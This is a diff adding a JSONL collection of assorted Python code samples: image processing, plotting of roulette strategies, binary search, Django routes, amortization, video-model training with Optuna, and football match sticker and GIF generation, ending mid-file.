diff --git "a/5753.jsonl" "b/5753.jsonl" new file mode 100644--- /dev/null +++ "b/5753.jsonl" @@ -0,0 +1,757 @@ +{"seq_id":"216810488","text":"'''\nColor Spaces\nBGR\nHSV\nLAB\nRGB\n'''\nimport cv2 as cv\nimport numpy as np \nimport matplotlib.pyplot as plt\n\n\ndir_path = os.getcwd()+'/data/images/'\nimg=cv.imread(dir_path+'flower.jpeg')\ncv.imshow('Flower',img)\n\n# 1 BGR to GRAY\ngray=cv.cvtColor(img,cv.COLOR_BGR2GRAY)\ncv.imshow('Gray',gray)\n\n# 2 BGR to HSV\nhsv=cv.cvtColor(img,cv.COLOR_BGR2HSV)\ncv.imshow('HSV',hsv)\n\n# 3 BGR to L*A*B\nlab=cv.cvtColor(img,cv.COLOR_BGR2LAB)\ncv.imshow('LAB',lab)\n\n# 4 MATPLOTLIB IS RGB method\nplt.imshow(img)\nplt.show()\n\n# 5 BGR to RGB\nrgb=cv.cvtColor(img,cv.COLOR_BGR2RGB)\ncv.imshow('RGB',rgb)\n\n# plt.imshow(rgb)\n# plt.show()\n\n# 6 HSV to BGR\nhsv_bgr=cv.cvtColor(hsv,cv.COLOR_HSV2BGR)\ncv.imshow('HSV to BGR',hsv_bgr)\n\n# 7 LAB to BGR\nlab_bgr = cv.cvtColor(lab,cv.COLOR_LAB2BGR)\ncv.imshow('LAB to BGR',lab_bgr)\n\ncv.waitKey(0)\n","sub_path":"7 Color Spaces.py","file_name":"7 Color Spaces.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"47279891","text":"import random\r\nimport numpy as np \r\nimport math\r\nfrom matplotlib import pyplot as p\r\nimport scipy.stats as ss\r\nfrom ejecucion_estrategys import *\r\n\r\n#def save(nombre):\r\n #p.savefig(f\"{nombre}.jpg\", bbox_inches='tight')\r\n\r\ndef graph_rondas(cant_jugadores, cant_jugadas, flujo_caja_total, capital0, capital_finito):\r\n #Ejecucion de varias rondas con varias corridas\r\n p.title(f'Flujo de caja en {cant_jugadores} rondas de {cant_jugadas} tiradas.')\r\n for i in range(cant_jugadores):\r\n X = np.arange(0, len(flujo_caja_total[i]))\r\n p.plot(X, flujo_caja_total[i])\r\n p.xlabel('Numero de tirada (n)')\r\n p.ylabel('Flujo de caja')\r\n\r\n if capital_finito:\r\n p.axhline(y = capital0, color = 'b', label = \"Flujo de caja inicial\")\r\n p.legend(loc = 'best')\r\n \r\n p.show()\r\ndef graph_diagrama_barras(cant_jugadores, frelativa_fav, cant_jugadas, frelativa_nofav):\r\n fig1 = p.figure(\"Diagramas de barra\")\r\n fig1.subplots_adjust(hspace=0.46, wspace=0.29, left=0.09, right=0.95)\r\n\r\n #=========================== Grafico de barras exitos\r\n fig1.add_subplot(2,1,1)\r\n p.bar(range(cant_jugadores),frelativa_fav, color = \"g\")\r\n p.xticks(range(cant_jugadores),range(cant_jugadas))\r\n p.title(\"Frecuencia relativa de exitos por ronda\")\r\n p.xlabel('Numero de ronda (N)')\r\n p.ylabel('Frec relativa de existos')\r\n\r\n #=========================== Grafico de barras fracasos\r\n fig1.add_subplot(2,1,2)\r\n p.bar(range(cant_jugadores),frelativa_nofav,color = \"r\")\r\n p.xticks(range(cant_jugadores),range(cant_jugadas))\r\n p.title(\"Frecuencia relativa de fracasos por ronda\")\r\n p.xlabel('Numero de ronda (N)')\r\n p.ylabel('Frec relativa de fracasos')\r\n p.show()\r\n\r\ndef graph_exitos_vs_fracasos(cant_jugadas,cant_jugadores,frelativa_fav,frelativa_nofav):\r\n #=========================== Funcion de exitos y fracasos\r\n p.figure(figsize=(10, 10))\r\n p.title(f'Frecuencia relativa de éxitos y fracasos por ronda: {cant_jugadas} corridas')\r\n p.plot(np.arange(0,cant_jugadores),frelativa_nofav, color = 'r', label='Cantidad de fracasos')\r\n p.plot(np.arange(0,cant_jugadores),frelativa_fav, color = 'g', label='Cantidad de exitos')\r\n p.xlabel('Numero de ronda (N)')\r\n p.ylabel('Frec relativa de exitos(v) - fracasos(r)')\r\n p.axhline(y = 0.5, color = 'b')\r\n p.legend(loc = 'best')\r\n p.show()\r\n \r\ndef graph_estrategias_casos_extremos(estrategia):\r\n #=========================== Comportamiento de las estrategias en casos extremos.\r\n rango = 6\r\n bet0 = 100\r\n loss = []\r\n win = []\r\n\r\n X_rondas = np.arange(1, rango + 1)\r\n if estrategia == 'Estrategia Martingala':\r\n for i in range(1, rango + 1):\r\n loss.append(bet0 * ((2 ** i) - 1))\r\n win.append(bet0 * i)\r\n\r\n elif estrategia == 'Estrategia Fibonacci':\r\n sec_fibo = 11 \r\n loss_total = 0\r\n cont_win = 0\r\n for i in range(sec_fibo,rango + sec_fibo):\r\n loss_total = loss_total + secuencia_fibonacci(i)\r\n cont_win += 1\r\n\r\n win.append( secuencia_fibonacci(sec_fibo) * cont_win) \r\n loss.append( loss_total)\r\n else:\r\n for i in range(1, rango + 1):\r\n win.append(bet0 * i)\r\n loss.append(bet0 * i)\r\n\r\n #=========================== Graficos\r\n p.figure(estrategia)#, figsize=(8, 8)) \r\n p.title('Casos extremos en n tiradas')\r\n p.plot(X_rondas, loss, color = 'r', label='Racha mala')\r\n p.plot(X_rondas, win, color = 'g', label='Racha buena')\r\n p.xlabel('Numero de tiradas (n)')\r\n p.ylabel('Catidad apostada acumulada en $')\r\n p.legend(loc='best')\r\n p.show()\r\n\r\ndef graph_martingala_dist_normal(estrategia):\r\n if estrategia == 'Estrategia Martingala':\r\n p.figure(figsize=(8, 8))\r\n n = 10\r\n p1 = 19/37\r\n for cant_jugadores in range(10,100,10):\r\n esperanza = round(1 - (p1*2)**n,2)\r\n sigma = round(np.sqrt((4 * p1)**n - (2 * p1)**(2*n)),2)\r\n\r\n esperanza = cant_jugadores * esperanza\r\n sigma = cant_jugadores * sigma\r\n\r\n X_normal = ss.norm(esperanza, sigma) #-30.56,365.41)\r\n x_normal = np.arange(X_normal.ppf(0.001),X_normal.ppf(0.999))\r\n p.title('Distribucion de ganacias Martingala')\r\n p.plot(x_normal,X_normal.pdf(x_normal))#, label = f'NT = {cant_jugadores}')\r\n \r\n p.axvline(esperanza, color = 'y', label='Media')\r\n p.xlabel('Ganancia')\r\n p.show() \r\n\r\ndef graph_pie(total_favs, total_no_favs):\r\n veces_ganadas_perdidas = [total_favs, total_no_favs]\r\n nombres = [\"cant. veces con ganancia\",\"cant. veces con perdida\"]\r\n p.pie(veces_ganadas_perdidas, labels=nombres, autopct=\"%0.1f %%\")\r\n p.title(\"Porcentaje cant. veces con ganancia VS perdida\")\r\n p.show()\r\n \r\ndef graph_flujo_recuperar_apuesta(cant_jugadas, pleno = 0):\r\n favs = 0\r\n nofavs = 0\r\n recuperando_apuesta = []\r\n for i in range(1, cant_jugadas + 1): \r\n if(tirar_ruleta(pleno)):\r\n favs += 1 \r\n else:\r\n nofavs += 1 \r\n #=========================== Lista para ver como es el flujo de recuperar el capital\r\n recuperando_apuesta.append(favs - nofavs)\r\n \r\n p.title('Recuperando la apuesta inicial')\r\n p.axhline(y = 0, color = 'b', label = 'Capital inicial')\r\n p.plot(np.arange(0,cant_jugadas), recuperando_apuesta, color = 'm', lw = '2')\r\n p.xlabel('Numero de tiradas (n)')\r\n p.ylabel('Variaciones en el flujo de caja')\r\n p.show()","sub_path":"TP 1.2 - Estudio economico ruleta/Codigo/graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":5563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"421111369","text":"#!/usr/bin/env python3\n\"\"\"Code ot plot thew TGDL solutions.\"\"\"\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif')\n\n# Path to the location you want to make a movie of\nload_path = '/home/james/Ising_Model_Codes/TGDL_Solutions/'\nfile_names = [\"ground_1.npy\", \"stripe_1.npy\", \"diagonal_1.npy\"]\n\nthe_times = [1.5, 2.5, 20, 300]\n\nwidth = 3.375\nheight = 3 * width / (len(the_times)) + 0.125\n\nfig, ax = plt.subplots(3, len(the_times), figsize=(width, height))\nfig.subplots_adjust(left=0.01, right=0.99, bottom=0.06, top=0.99,\n wspace=0.05, hspace=0.05)\n\nfor file_name in enumerate(file_names):\n\n snapshots = np.load(load_path + file_name[1])\n sample_times = np.load(load_path + 'measured_times.npy')\n\n for i in range(len(the_times)):\n\n index = np.argmin(np.abs(sample_times - the_times[i]))\n\n frame_num = index\n ax[file_name[0], i].imshow(snapshots[:, :, frame_num],\n vmin=-1, vmax=1, cmap=\"RdGy\")\n\n ax[file_name[0], i].set_xticks([])\n ax[file_name[0], i].set_yticks([])\n\n ax[-1, i].set_xlabel(r\"$t = %.2f$\" %\n np.round(sample_times[frame_num], 2),\n fontsize=10, labelpad=2)\n\nx_pos, y_pos = 0.7, 0.86\nax[0, -1].text(x_pos, y_pos, r\"(a)\", color=\"white\", fontsize=10,\n transform=ax[0, -1].transAxes)\nax[1, -1].text(x_pos, y_pos, r\"(b)\", color=\"white\", fontsize=10,\n transform=ax[1, -1].transAxes)\nax[2, -1].text(x_pos, y_pos, r\"(c)\", color=\"white\", fontsize=10,\n transform=ax[2, -1].transAxes)\n\n\nif not os.path.exists(\"images/\"):\n os.makedirs(\"images/\")\n\nfig.savefig(\"images/tgdl_evo.pdf\", format=\"pdf\", dpi=1000)\n","sub_path":"plot_evolution.py","file_name":"plot_evolution.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"169686212","text":"def binary_search_recursive(alist, item):\n if len(alist) == 0:\n return False\n\n mid_idx = len(alist) // 2\n\n if alist[mid_idx] == item:\n return True\n elif alist[mid_idx] < item:\n return binary_search_recursive(alist[mid_idx + 1:], item)\n else:\n return binary_search_recursive(alist[:mid_idx], item)\n\n\ndef binary_search(alist, item):\n low, high = 0, len(alist) - 1\n\n while low < high:\n mid_idx = (low + high) // 2\n if alist[mid_idx] == item:\n return True\n elif alist[mid_idx] < item:\n low = mid_idx + 1\n else:\n high = mid_idx - 1\n\n return False\n\n\ntestlist = [0, 1, 2, 8, 13, 17, 19, 32, 42, ]\nprint(binary_search_recursive(testlist, 3))\nprint(binary_search_recursive(testlist, 13))\n\nprint(binary_search(testlist, 3))\nprint(binary_search(testlist, 13))\n","sub_path":"codes/13_binary_search.py","file_name":"13_binary_search.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"313881432","text":"from django.conf.urls import url\n\nfrom . import views\n\n\nuuid_regex = '([a-zA-Z]|[0-9]){8}\\-([a-zA-Z]|[0-9]){4}\\-([a-zA-Z]|[0-9]){4}\\-([a-zA-Z]|[0-9]){4}\\-([a-zA-Z]|[0-9]){12}'\n\n\nurlpatterns = [\n url(r'^create-user/$', views.create_user_view, name='create_user'),\n url(r'(?P{})/$'.format(uuid_regex), views.write_key_view,\n name='write_key'),\n url(r'^(?P{})/(?P[A-Za-z0-9]+)/$'.format(uuid_regex),\n views.get_or_delete_view, name='get_key'),\n]\n","sub_path":"week2/FirstDay/keyvaluestore2/store/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"523299187","text":"from pylab import *\nfrom EL63 import EL63\n\ndef obs_prop(obs,truth,h=0.01,a=10.0,b=8.0/3.0,r=28.0,tfin=2000,tanl=20):\n #loop over number of analyses\n Nanl = int(tfin/tanl)\n out_traj = zeros([3,tfin+1])\n for j in range(Nanl-1):\n #propagate each particle to next analysis step\n out_traj[:,(j+1)*tanl:(j+2)*tanl+1] = EL63(tanl,h,obs[:,j],a,r,b)\n \n error = abs(out_traj - truth)\n error_dist = zeros(tfin+1) \n avg_error = zeros(tfin+1)\n for i in range(tfin+1):\n error_dist[i] = sqrt(error[:,i].dot(error[:,i]))\n avg_error[i] = mean(error_dist[0:i+1])\n return(out_traj,error, avg_error)","sub_path":"obs_prop.py","file_name":"obs_prop.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"297218907","text":"import os\nimport pandas as pd\nimport numpy as np\nfrom PIL import Image\n\nim_path = '../input/ships_train2018'\ncsv_train = '../input/train_ship_segmentations_v2.csv'\n\nif __name__ == '__main__':\n # 读取原始标注文件\n df = pd.read_csv(csv_train)\n print(\"所有标注数: \",df.shape[0])\n\n # 去除空标注\n df = df.dropna(axis=0)\n num_of_ships = df.shape[0]\n print(\"实例标注数: \",num_of_ships)\n\n # 新建一个空集合,用于存放图片名称\n images = set()\n for line in range(num_of_ships):\n if df.iloc[line,0] not in images:\n images.add(df.iloc[line,0])\n print(\"含船图片数: \",len(images))\n\n # 删除无船图片\n count = 0\n ims = os.listdir(im_path)\n for im in ims:\n if im not in images:\n os.remove(os.path.join(im_path, im))\n count += 1\n print('%d images is deleted.'%(count))","sub_path":"0_airbus_delete_empty_im.py","file_name":"0_airbus_delete_empty_im.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"596031976","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\n\nclass Amortization(object):\n\n def __init__(self, amount, interest, n):\n self.amount = amount\n self.interest = interest\n self.n = n\n @property\n def annuity(self):\n return self.interest * self.amount / (1 - ( 1 + self.interest) ** self.n)\n\n def get_table(self):\n \"\"\"Create a pandas dataframe representing the amortization table.\"\"\"\n rows = []\n loan_value = self.amount\n payment = self.annuity\n for i in range(self.n):\n interest_value = loan_value * self.interest\n principal = payment - interest_value\n loan_value = loan_value - principal\n rows.append({\n \"interest\": interest_value,\n \"payment\": payment,\n \"principal\":principal,\n \"loan_value\": loan_value\n })\n return pd.DataFrame(rows).rename_axis(\"period\").reset_index()\n\n def get_plot(self):\n \"\"\"Create a plot (fig) to visualize at least two variables from the amortization table.\"\"\"\n df = self.get_table()\n plot = df.plot.bar(x=\"period\", y=[\"principal\",\"interest\"], stacked=True)\n fig = plot.get_figure()\n plt.show()\n return fig\n\n","sub_path":"activities/classwork/amortization/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"415883510","text":"import os\nimport sys\nimport json\nimport math\nimport numpy as np\nimport torch\nfrom torch import nn\nfrom torch import optim\nfrom torch.optim import lr_scheduler\n\nfrom opts import parse_opts\nfrom model import generate_model\nfrom mean import get_mean, get_std\nfrom spatial_transforms import (\n Compose, Normalize, Scale, CenterCrop, CornerCrop, MultiScaleCornerCrop,\n MultiScaleRandomCrop, RandomHorizontalFlip, ToTensor)\nfrom temporal_transforms import LoopPadding, TemporalRandomCrop\nfrom target_transforms import ClassLabel, VideoID\nfrom target_transforms import Compose as TargetCompose\nfrom dataset import get_training_set, get_validation_set, get_test_set\nfrom utils import Logger, ImbalancedDatasetSampler\nfrom train import train_epoch\nfrom validation import val_epoch\nimport test\n\nfrom tensorboardX import SummaryWriter\n\nimport optuna\n\n\ndef objective(trial):\n opt = parse_opts()\n\n if trial:\n opt.weight_decay = trial.suggest_uniform('weight_decay', 0.01, 0.1)\n opt.learning_rate = trial.suggest_uniform('learning_rate', 1-5, 1-4)\n\n if opt.root_path != '':\n opt.video_path = os.path.join(opt.root_path, opt.video_path)\n opt.annotation_path = os.path.join(opt.root_path, opt.annotation_path)\n opt.result_path = os.path.join(opt.root_path, opt.result_path)\n if opt.resume_path:\n opt.resume_path = os.path.join(opt.root_path, opt.resume_path)\n if opt.pretrain_path:\n opt.pretrain_path = os.path.join(opt.root_path, opt.pretrain_path)\n opt.scales = [opt.initial_scale]\n for i in range(1, opt.n_scales):\n opt.scales.append(opt.scales[-1] * opt.scale_step)\n opt.arch = '{}-{}'.format(opt.model, opt.model_depth)\n opt.mean = get_mean(opt.norm_value, dataset=opt.mean_dataset)\n opt.std = get_std(opt.norm_value)\n print(opt)\n with open(os.path.join(opt.result_path, 'opts.json'), 'w') as opt_file:\n json.dump(vars(opt), opt_file)\n\n torch.manual_seed(opt.manual_seed)\n\n model, parameters = generate_model(opt)\n print(model)\n criterion = nn.CrossEntropyLoss()\n if not opt.no_cuda:\n criterion = criterion.cuda()\n\n if opt.no_mean_norm and not opt.std_norm:\n norm_method = Normalize([0, 0, 0], [1, 1, 1])\n elif not opt.std_norm:\n norm_method = Normalize(opt.mean, [1, 1, 1])\n else:\n norm_method = Normalize(opt.mean, opt.std)\n\n # norm_method = Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n\n if not opt.no_train:\n assert opt.train_crop in ['random', 'corner', 'center']\n if opt.train_crop == 'random':\n crop_method = MultiScaleRandomCrop(opt.scales, opt.sample_size)\n elif opt.train_crop == 'corner':\n crop_method = MultiScaleCornerCrop(opt.scales, opt.sample_size)\n elif opt.train_crop == 'center':\n crop_method = MultiScaleCornerCrop(\n opt.scales, opt.sample_size, crop_positions=['c'])\n spatial_transform = Compose([\n crop_method,\n RandomHorizontalFlip(),\n ToTensor(opt.norm_value), norm_method\n ])\n temporal_transform = TemporalRandomCrop(opt.sample_duration)\n target_transform = ClassLabel()\n training_data = get_training_set(opt, spatial_transform,\n temporal_transform, target_transform)\n train_loader = torch.utils.data.DataLoader(\n training_data,\n batch_size=opt.batch_size,\n # sampler option is mutually exclusive with shuffle\n shuffle=False,\n sampler=ImbalancedDatasetSampler(training_data),\n num_workers=opt.n_threads,\n pin_memory=True)\n train_logger = Logger(\n os.path.join(opt.result_path, 'train.log'),\n ['epoch', 'loss', 'acc', 'lr'])\n train_batch_logger = Logger(\n os.path.join(opt.result_path, 'train_batch.log'),\n ['epoch', 'batch', 'iter', 'loss', 'acc', 'lr'])\n\n optimizer = optim.Adam(\n parameters, lr=opt.learning_rate, weight_decay=opt.weight_decay)\n scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(\n optimizer, verbose=True, factor=0.1 ** 0.5)\n if not opt.no_val:\n spatial_transform = Compose([\n Scale(opt.sample_size),\n CenterCrop(opt.sample_size),\n ToTensor(opt.norm_value), norm_method\n ])\n temporal_transform = LoopPadding(opt.sample_duration)\n target_transform = ClassLabel()\n validation_data = get_validation_set(\n opt, spatial_transform, temporal_transform, target_transform)\n val_loader = torch.utils.data.DataLoader(\n validation_data,\n batch_size=opt.batch_size,\n shuffle=False,\n sampler=ImbalancedDatasetSampler(validation_data),\n num_workers=opt.n_threads,\n pin_memory=True)\n val_logger = Logger(\n os.path.join(opt.result_path, 'val.log'), ['epoch', 'loss', 'acc'])\n\n if opt.resume_path:\n print('loading checkpoint {}'.format(opt.resume_path))\n checkpoint = torch.load(opt.resume_path)\n assert opt.arch == checkpoint['arch']\n\n opt.begin_epoch = checkpoint['epoch']\n model.load_state_dict(checkpoint['state_dict'])\n if not opt.no_train:\n optimizer.load_state_dict(checkpoint['optimizer'])\n\n print('run')\n writer = SummaryWriter(\n comment=f\"_wd{opt.weight_decay}_lr{opt.learning_rate}_ft_begin{opt.ft_begin_index}_pretrain{not opt.pretrain_path == ''}\")\n for i in range(opt.begin_epoch, opt.n_epochs + 1):\n if not opt.no_train:\n epoch, losses_avg, accuracies_avg = train_epoch(i, train_loader, model, criterion, optimizer, opt,\n train_logger, train_batch_logger)\n writer.add_scalar('loss/train', losses_avg, epoch)\n writer.add_scalar('acc/train', accuracies_avg, epoch)\n\n if not opt.no_val:\n epoch, val_losses_avg, val_accuracies_avg = val_epoch(i, val_loader, model, criterion, opt,\n val_logger)\n writer.add_scalar('loss/val', val_losses_avg, epoch)\n writer.add_scalar('acc/val', val_accuracies_avg, epoch)\n\n if not opt.no_train and not opt.no_val:\n scheduler.step(val_losses_avg)\n print('=' * 100)\n\n if opt.test:\n spatial_transform = Compose([\n Scale(int(opt.sample_size / opt.scale_in_test)),\n CornerCrop(opt.sample_size, opt.crop_position_in_test),\n ToTensor(opt.norm_value), norm_method\n ])\n temporal_transform = LoopPadding(opt.sample_duration)\n target_transform = VideoID()\n\n test_data = get_test_set(opt, spatial_transform, temporal_transform,\n target_transform)\n test_loader = torch.utils.data.DataLoader(\n test_data,\n batch_size=opt.batch_size,\n shuffle=False,\n num_workers=opt.n_threads,\n pin_memory=True)\n test.test(test_loader, model, opt, test_data.class_names)\n\n writer.close()\n return val_losses_avg\n\n\ndef main():\n opt = parse_opts()\n print('=' * 100)\n print(f'OPTUNA_TRIALS = {opt.optuna_trials}')\n print('=' * 100)\n if opt.optuna_trials:\n study = optuna.create_study()\n study.optimize(objective, n_trials=opt.optuna_trials)\n print(study.best_params)\n else:\n objective(None)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"511160597","text":"import os\nimport cv2\nimport pandas as pd\nimport numpy as np\nimport imageio\nfrom PIL import Image, ImageFont, ImageDraw\nfrom pygifsicle import optimize\nimport glob\nimport json\n\nMATCHES_INFO_PATH = './Data/matches_info.csv'\nmatches_info_global = pd.read_csv(\n MATCHES_INFO_PATH\n)\n\nteams_info_file = './Data/teams_info.json'\nwith open(teams_info_file, 'r') as file:\n teams_info_global = json.load(file)\n\n\ndef return_closest_match_info(input_dict, matches_df):\n '''\n input_dict = {'lon': 0, 'lat': 0, 'time': 0}\n '''\n lonlat = matches_df.loc[:, ['venue_lon', 'venue_lat']].values\n user_lonlat = np.array([input_dict['lon'], input_dict['lat']])\n dists = np.square(lonlat[:,np.newaxis]-user_lonlat).sum(axis=2)\n closest_venue_id = matches_df.iloc[np.argmin(dists),:]['venue_id']\n closest_matches = matches_df[matches_df['venue_id'] == closest_venue_id]\n closest_match_id = np.argmin(closest_matches['match_start_time'].values - input_dict['time'])\n result = dict(closest_matches.iloc[closest_match_id, :])\n INT_COLS = ['match_id', 'match_start_time', 'venue_capacity', 'home_score', 'away_score']\n FLOAT_COLS = ['venue_lon', 'venue_lat']\n for col in INT_COLS:\n result[col] = int(result[col])\n for col in FLOAT_COLS:\n result[col] = float(result[col])\n del result['Unnamed: 0']\n return result\n\n\ndef alpha_blend(fg, bg, alpha):\n fg = fg.astype(\"float\")\n bg = bg.astype(\"float\")\n alpha = alpha.astype(\"float\") / 255\n fg = cv2.multiply(alpha, fg)\n bg = cv2.multiply(1 - alpha, bg)\n output = cv2.add(fg, bg)\n return output.astype(\"uint8\")\n\n\ndef overlay_image(bg, fg, fgMask, coords):\n (sH, sW) = fg.shape[:2]\n (x, y) = coords\n overlay = np.zeros(bg.shape, dtype=\"uint8\")\n overlay[y:y + sH, x:x + sW] = fg\n alpha = np.zeros(bg.shape[:2], dtype=\"uint8\")\n alpha[y:y + sH, x:x + sW] = fgMask\n alpha = np.dstack([alpha] * 3)\n output = alpha_blend(overlay, bg, alpha)\n return output\n\n\ndef create_sticker_with_info(match_info):\n img = imageio.imread(\"./Data/versus_bkg.png\")\n back_alpha = img[:, :, 3]\n back = img[:, :, :3]\n logo_1 = cv2.resize(\n imageio.imread(match_info[\"home_team_logo\"]), (70, 70)\n )\n logo_2 = cv2.resize(\n imageio.imread(match_info[\"away_team_logo\"]), (70, 70)\n )\n overlay = overlay_image(\n back, logo_1[:, :, :3], logo_1[:, :, 3], (20, 0)\n )\n overlay = overlay_image(\n overlay, logo_2[:, :, :3], logo_2[:, :, 3], (back.shape[1] - 90, 0)\n )\n \n fontpath = \"./Data/Grey Sans Bold.ttf\" \n font = ImageFont.truetype(fontpath, 24)\n img_pil = Image.fromarray(overlay)\n draw = ImageDraw.Draw(img_pil)\n b,g,r,a = 0,0,0,0\n draw.text((50, overlay.shape[0] - 35), str(match_info[\"home_score\"]), font=font, fill=(b,g,r,a))\n draw.text((overlay.shape[1] - 65, overlay.shape[0] - 35), str(match_info[\"away_score\"]), font=font, fill=(b,g,r,a))\n \n overlay = np.array(img_pil)\n png = np.dstack((overlay, back_alpha))\n return png\n\n\ndef generate_gifs(image, match_info, choice):\n if ((int(choice) == 1) and (match_info[\"home_score\"] > match_info[\"away_score\"])) or ((int(choice) == 2) and (match_info[\"home_score\"] <= match_info[\"away_score\"])):\n GIF_FOLDERS = [\"win\"]\n else:\n GIF_FOLDERS = [\"noooo\"]\n GIF_FOLDERS += ['goal', '1_0', 'woman_red_card']#, 'noooo', 'win' 'lost']\n SCALE_FACTORS = {'woman_red_card': (2, 2), 'goal': (1, 1), '1_0': (5, 5), \n 'noooo': (2, 2), 'win': (2, 2)}#, 'lost': (2, 2)}\n COORDS = {'woman_red_card': (0.6, 0.8), 'goal': (0, 0.3), '1_0': (0.1, 0.85), \n 'noooo': (0, 0.8), 'win': (0.1,0.75)}#, 'lost': (0,0.7)}\n NUM_FRAMES = {'woman_red_card': 45, 'goal': 24, '1_0': 10, \n 'noooo': 8, 'win': 2}#, 'lost': 2}\n DURATION = {'woman_red_card': 50, 'goal': 100, '1_0': 150, \n 'noooo': 100, 'win': 100}#, 'lost': 100}\n \n STATIC_IMAGE = cv2.resize(image, dsize=(480, 640))\n\n for i, gif_name in enumerate(GIF_FOLDERS):\n static_image = STATIC_IMAGE\n if gif_name == 'win' or gif_name == 'noooo':\n versus_sticker = create_sticker_with_info(match_info=match_info)\n versus_img = versus_sticker[:,:,:3]\n versus_img_mask = versus_sticker[:,:,3]\n static_image = overlay_image(\n bg=static_image, \n fg=versus_img, \n fgMask=versus_img_mask, \n coords=(\n static_image.shape[1]//4,\n 20\n )\n )\n gif = []\n for img_name in sorted(glob.glob(f'./Data/{gif_name}/frame_*.gif')):\n curr_frame = imageio.mimread(img_name)[0]\n gif.append(\n cv2.resize(\n curr_frame, \n dsize=(\n curr_frame.shape[1]//SCALE_FACTORS[gif_name][0], \n curr_frame.shape[0]//SCALE_FACTORS[gif_name][1])\n )\n ) \n gif_array = []\n for idx, gif_frame in enumerate(gif):\n gif_img = gif_frame[:,:,:3]\n gif_img_mask = gif_frame[:,:,3]\n overlayed_img = overlay_image(\n bg=static_image, \n fg=gif_img, \n fgMask=gif_img_mask, \n coords=(\n int(static_image.shape[1]*COORDS[gif_name][0]),\n int(static_image.shape[1]*COORDS[gif_name][1])\n )\n )\n gif_array.append(Image.fromarray(overlayed_img))\n # GIF version\n gif_array[0].save(\n f'./static/gifs/{i}.gif', \n save_all=True, \n append_images=gif_array[:NUM_FRAMES[gif_name]], \n duration=DURATION[gif_name], \n loop=0\n )\n optimize(f'./static/gifs/{i}.gif')\n # VIDEO version\n# dump_video(\n# filename=f'./static/gifs/{i}.mp4',\n# clip=gif_array\n# )\n \n return [f'95.213.37.132:5000/static/gifs/{i}.gif' for i in range(len(GIF_FOLDERS))]\n\n\ndef interpolate(f_co, t_co, interval):\n det_co =[(t - f) / interval for f , t in zip(f_co, t_co)]\n for i in range(interval):\n yield [round(f + det * i) for f, det in zip(f_co, det_co)]\n\n \ndef return_gradient(teams_info, team_name):\n ALREADY_GENERATED_GRADS = [x.split('.')[0] for x in os.listdir('./static/grads/')]\n if team_name in ALREADY_GENERATED_GRADS:\n return f'http://95.213.37.132:5000/static/grads/{team_name}.jpg'\n h1 = teams_info[team_name]['colors'][0]['first'].lstrip('#')\n h2 = teams_info[team_name]['colors'][0]['second'].lstrip('#')\n rgb1 = tuple(int(h1[i:i+2], 16) for i in (0, 2, 4))\n rgb2 = tuple(int(h2[i:i+2], 16) for i in (0, 2, 4))\n gradient = Image.new('RGBA', (720, 240), color=0)\n draw = ImageDraw.Draw(gradient)\n for i, color in enumerate(interpolate(rgb1, rgb2, 720 * 2)):\n draw.line([(i, 0), (0, i)], tuple(color), width=1)\n gradient = np.array(gradient)\n logo_img = imageio.imread(teams_info[team_name]['logo']['main'])\n scale = gradient.shape[0] / logo_img.shape[1]\n logo_img = cv2.resize(\n logo_img, dsize=(int(logo_img.shape[1]*scale), int(logo_img.shape[0]*scale))\n )\n center_x = gradient.shape[1]//2-logo_img.shape[1]//2\n if logo_img.shape[2] == 3:\n logo_alpha = np.ones((logo_img.shape[0], logo_img.shape[1], 4))*255\n logo_alpha[...,:3] = logo_img\n logo_img = logo_alpha\n grad_with_logo = overlay_image(\n bg=gradient[...,:3], fg=logo_img[...,:3], fgMask=logo_img[...,3], coords=(center_x, 0)\n )\n cv2.imwrite(f'./static/grads/{team_name}.jpg', grad_with_logo)\n return f'http://95.213.37.132:5000/static/grads/{team_name}.jpg'\n\n\ndef return_feed_info(team_name):\n global matches_info_global\n global teams_info_global\n teams_info = teams_info_global\n matches_info = matches_info_global\n# grad_with_logo_link = return_gradient(teams_info, team_name)\n team_id = teams_info[team_name]['id']\n team_matches = matches_info[\n (matches_info['home_team_id'] == team_id) | (matches_info['away_team_id'] == team_id)\n ]\n team_matches = team_matches[\n (team_matches['home_score'] != 0) & (matches_info['away_score'] != 0)\n ]\n team_matches.sort_values('match_start_time', ascending=False, inplace=True)\n matches_for_feed = team_matches.iloc[:2, :]\n result_list = []\n for row_match in matches_for_feed.iterrows():\n score_comment = ''\n match = row_match[1]\n if team_id == match['home_team_id']:\n won = match['home_score'] > match['away_score']\n draw = match['home_score'] == match['away_score']\n elif team_id == match['away_team_id']:\n won = match['away_score'] > match['home_score']\n draw = match['away_score'] == match['home_score']\n score_comment = 'Победа!' if won else ('Ничья!' if draw else 'Проигрыш.')\n score_comment += f' \\nФинальный счет: {match[\"home_score\"]} -- {match[\"away_score\"]}'\n score_comment += ' 🎉' if won else (' 😕' if draw else ' 😔')\n show_home_name = 